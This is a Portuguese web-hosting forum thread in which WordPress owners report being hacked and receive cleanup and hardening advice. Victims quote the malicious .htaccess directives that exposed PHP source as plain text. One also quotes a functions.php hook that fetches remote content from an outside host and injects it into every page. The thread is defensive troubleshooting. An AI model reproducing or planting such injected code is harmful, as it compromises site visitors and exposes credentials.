← Hosting

Estou a ser hackeado

Lida 5234 vezes

Offline

myStoned 
Membro
Mensagens 663 Gostos 8
Feedback +2

Troféus totais: 29
Trófeus: (Ver todos)
Level 5 Tenth year Anniversary Nineth year Anniversary Mobile User Apple User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter

Estou a ser hackeado. Pela segunda vez, a primeira foi uma alteração ao documento Index.php do Wordpres, pensei que tivesse ficado por ai, mas hoje ao aceder ao meu alojamento em contrei mais um ficheiro, shellpre.pl (terminação que nunca tinha visto, mas aparece o ícone de PERL no meu alojamento).

Alguma ideia de como para isto? Agradeço bastante.

Cumprimentos.
Offline

myStoned 
Membro
Mensagens 663 Gostos 8
Feedback +2

Troféus totais: 29
Trófeus: (Ver todos)
Level 5 Tenth year Anniversary Nineth year Anniversary Mobile User Apple User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter

Vale a pena mecionar, que já atingiu o segundo site que tinha no alojamento e por agora tenho tudo exposto, quem visita clica nas pastas e vê todo o código, faz o download dos temas, consulta o wp-config.php, enfim...

Alguém me consegue ajudar?
Offline

asturmas 
Administrador
Mensagens 19734 Gostos 50
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Faz backup
Apaga todos os ficheiros e pastas do WordPress MENOS estes: wp-config.php e wp-content (isto a assumir que não tens alterações ao core)
Reenvia a ultima versão do WordPress para o alojamento
Altera todas as passwords incluindo os dados de acesso a base de dados
Verifica se não tens esta vulnerabilidade: http://blog.ptservidor.pt/seguranca/alerta-de-seguranca-vulnerabilidade-timthumb/
Contacta o suporte do teu alojamento para ver se podem descobrir a causa

Mas isso de ver os files é estranho
Offline

myStoned 
Membro
Mensagens 663 Gostos 8
Feedback +2

Troféus totais: 29
Trófeus: (Ver todos)
Level 5 Tenth year Anniversary Nineth year Anniversary Mobile User Apple User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter

Faz backup
Apaga todos os ficheiros e pastas do WordPress MENOS estes: wp-config.php e wp-content (isto a assumir que não tens alterações ao core)
Reenvia a ultima versão do WordPress para o alojamento
Altera todas as passwords incluindo os dados de acesso a base de dados
Verifica se não tens esta vulnerabilidade: http://blog.ptservidor.pt/seguranca/alerta-de-seguranca-vulnerabilidade-timthumb/
Contacta o suporte do teu alojamento para ver se podem descobrir a causa

Mas isso de ver os files é estranho
Vou agora mesmo fazer isso asturmas, outra questão o meu .htacess foi alterado ontém (eu não fui) e tinha o seguinte código/texto:

Código: [Seleccione]
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddHandler cgi-script .ps
AddHandler cgi-script .ps

Abraço
Offline

asturmas 
Administrador
Mensagens 19734 Gostos 50
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Ok, foi isso que fez o conteúdo ser mostrado em plain text.
Apaga
Offline

myStoned 
Membro
Mensagens 663 Gostos 8
Feedback +2

Troféus totais: 29
Trófeus: (Ver todos)
Level 5 Tenth year Anniversary Nineth year Anniversary Mobile User Apple User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter

Ok, foi isso que fez o conteúdo ser mostrado em plain text.
Apaga
Obrigado asturmas pela colaboração, por agora acho que ficou resolvido.

Abraço!
Offline

epape 
Membro
Mensagens 42 Gostos 1
Troféus totais: 22
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 4 Level 3 Level 2 Level 1 10 Posts First Post Signature

Boas,
Instala os plugins Wordfence e Better WP Security e segue as recomendações principalmente do último.
Faz o que dizem no caso de apagar os ficheiros todos e colocar novos.
Apaga todos os plugins e temas que não precisas.
Actualiza sempre tudo.
Muda as passwords (WP, alojamento, ftp, etc)
Comigo tem resolvido.

Normalmente quando conseguem entrar no teu servidor e alojamento colocam ficheiros que permitem injectar código ou mesmo ficheiros.

O Wordfence analisa o site e diz-te onde estão os erros.
Offline

TEkN0 
Membro
Mensagens 83 Gostos 0
Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 50 Posts 10 Posts First Post Karma

Pelos vistos também fui hackeado, o que eu pensava ser uma falta do host afinal foi um malandrito que injectou no meu functions.php o seguinte código
Código: [Seleccione]
if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}O que fazia com que o site era sempre redirecionado para o link http://www.jqueryc.com/.
Já instalei o Wordfence e o WP Security vamos lá ver se não volta a acontecer...
Offline

epape 
Membro
Mensagens 42 Gostos 1
Troféus totais: 22
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 4 Level 3 Level 2 Level 1 10 Posts First Post Signature

confesso que mesmo com esses plugins já fui infectado pela vps.
se usas o cloudflare o better security pode bloquear os IPs da cloudflare e criar muitos bloqueios.
Offline

asturmas 
Administrador
Mensagens 19734 Gostos 50
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

confesso que mesmo com esses plugins já fui infectado pela vps.
se usas o cloudflare o better security pode bloquear os IPs da cloudflare e criar muitos bloqueios.
A minha opiniao (e experiência) dizme que com os cuidados certos não são precisos plugins manhosos de segurança nem limitações xpto.
O problema principal são mesmo passwords fracas, computadores infectados e software desactualizado.
Offline

myStoned 
Membro
Mensagens 663 Gostos 8
Feedback +2

Troféus totais: 29
Trófeus: (Ver todos)
Level 5 Tenth year Anniversary Nineth year Anniversary Mobile User Apple User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter

A minha opiniao (e experiência) dizme que com os cuidados certos não são precisos plugins manhosos de segurança nem limitações xpto.
O problema principal são mesmo passwords fracas, computadores infectados e software desactualizado.

Bom dia,

O meu problema acho que é mesmo plugins desactualizados, e penso que seja um em questão que uso em todos os sites, ainda não descobri foi qual, mas penso que seja ou o Contact Form 7 ou All in one seo pack...

Offline

asturmas 
Administrador
Mensagens 19734 Gostos 50
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Bom dia,

O meu problema acho que é mesmo plugins desactualizados, e penso que seja um em questão que uso em todos os sites, ainda não descobri foi qual, mas penso que seja ou o Contact Form 7 ou All in one seo pack...


Algum desses plugins teve alguma security issue corrigida entre a versão que tens e a mais recente?..
Offline

myStoned 
Membro
Mensagens 663 Gostos 8
Feedback +2

Troféus totais: 29
Trófeus: (Ver todos)
Level 5 Tenth year Anniversary Nineth year Anniversary Mobile User Apple User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter

Algum desses plugins teve alguma security issue corrigida entre a versão que tens e a mais recente?..

Foi coisa que sinceramente não reparei, mas de qualquer maneira ainda me falta recuperar um site e vou ver ter em conta isso ao actualizar os plugins.
Não costuma acontecer nada demais, apenas me editam o .htacess e alteram o index.php do Wordpress, mas não apagam nem mexem em ficheiros.

Vou ver isso e depois digo aqui o que pode ser que esteja a dar esse acesso facilitado para outros também terem em conta.

Cumprimentos.